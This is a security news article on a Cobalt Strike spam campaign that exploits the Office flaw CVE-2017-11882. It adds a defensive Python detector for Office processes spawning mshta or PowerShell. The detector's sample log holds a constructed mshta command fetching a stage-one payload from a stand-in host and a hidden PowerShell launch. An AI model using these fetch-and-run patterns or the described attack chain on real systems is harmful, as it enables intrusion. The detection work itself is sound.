Cobalt malware leverages recently patched 17-year-old Microsoft flaw


Just in the nick of time...

Cobalt malware was documented exploiting the 17-year-old CVE-2017-11882 vulnerability via spam just a few days after researchers noted a similar spam campaign exploiting RTF documents.

Microsoft only recently patched the memory corruption vulnerability, which exists in Office because the software fails to properly handle objects in memory. The flaw could allow an attacker to run arbitrary code.

Shortly after the vulnerability was announced, threat actors weaponised the flaw to deliver malware using a component from the Cobalt Strike penetration testing tool, according to a Nov. 27 Fortinet blog post. The malware is spread via a spam campaign posing as a notification from Visa about rule changes to its payWave service in Russia, and is carried in a malicious RTF document attachment.

Researchers said the CVE-2017-11882 exploit leads to a Cobalt Strike Beacon, and that in this attack multiple stages of scripts are downloaded and executed before the main malware payload is reached. Once the exploit is triggered, an obfuscated JavaScript file is downloaded and executed using Microsoft HTML Application Host.

“Once the document is opened, the user is presented with a plain document,” researchers said in the post. “However, in the background a PowerShell script is already being spawned that will eventually download a Cobalt Strike client to take control of the victim's system.”

The cyber-criminals behind the attack were able to load Cobalt Strike's module without writing it to disk as a file, instead using trusted Microsoft Windows tools to run client-side scripts, a technique that traditional anti-virus products can overlook.
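Because nothing is written to disk, the process lineage is what a defender is left with: an Office document handler spawning a script host such as mshta.exe or PowerShell, as in the chain described above. The following detection logic is an added example, not code from the article or from Fortinet; the process-creation log is constructed, the log format is invented for the example, and the image names are assumptions (EQNEDT32.EXE is the Equation Editor component CVE-2017-11882 lives in, which the article does not name).

```python
import ntpath
from dataclasses import dataclass

# Assumed image names: Office hosts plus EQNEDT32.EXE (the Equation Editor
# component CVE-2017-11882 targets), and the trusted Windows script hosts the
# article says were used instead of dropping a file to disk.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str  # lower-cased basename, e.g. "mshta.exe"
    cmdline: str

def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'pid|ppid|image path|command line' record."""
    pid, ppid, image, cmdline = line.split("|", 3)
    return ProcEvent(int(pid), int(ppid), ntpath.basename(image).lower(), cmdline.strip())

def office_ancestor(ev: ProcEvent, by_pid: dict, max_depth: int = 5):
    """Walk up the parent chain; return the first Office image found, else None."""
    cur = by_pid.get(ev.ppid)
    for _ in range(max_depth):
        if cur is None:          # parent not in the log (or chain exhausted)
            return None
        if cur.image in OFFICE_PARENTS:
            return cur.image
        cur = by_pid.get(cur.ppid)
    return None

def find_suspicious_chains(lines):
    """Return (office_image, script_host, pid) for each script host with an Office ancestor."""
    events = [parse_event(l) for l in lines if l.strip()]
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.image in SCRIPT_HOSTS:
            anc = office_ancestor(ev, by_pid)
            if anc:
                hits.append((anc, ev.image, ev.pid))
    return hits

# Constructed process-creation log mirroring the chain described in the article.
SAMPLE_LOG = """\
400|300|C:\\Windows\\explorer.exe|explorer.exe
512|400|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|WINWORD.EXE "payWave_notice.rtf"
640|512|C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE|EQNEDT32.EXE -Embedding
700|640|C:\\Windows\\System32\\mshta.exe|mshta.exe http://example.invalid/stage1.hta
820|700|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden <constructed>
"""
```

Running `find_suspicious_chains(SAMPLE_LOG.splitlines())` flags both mshta.exe and the PowerShell it spawns, because the walk up the parent chain reaches EQNEDT32.EXE in both cases; a lone powershell.exe whose parent is absent from the log is not flagged.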

Users are urged to update their systems as soon as possible to avoid infection.

This article originally appeared at scmagazineuk.com

Copyright © SC Magazine, UK edition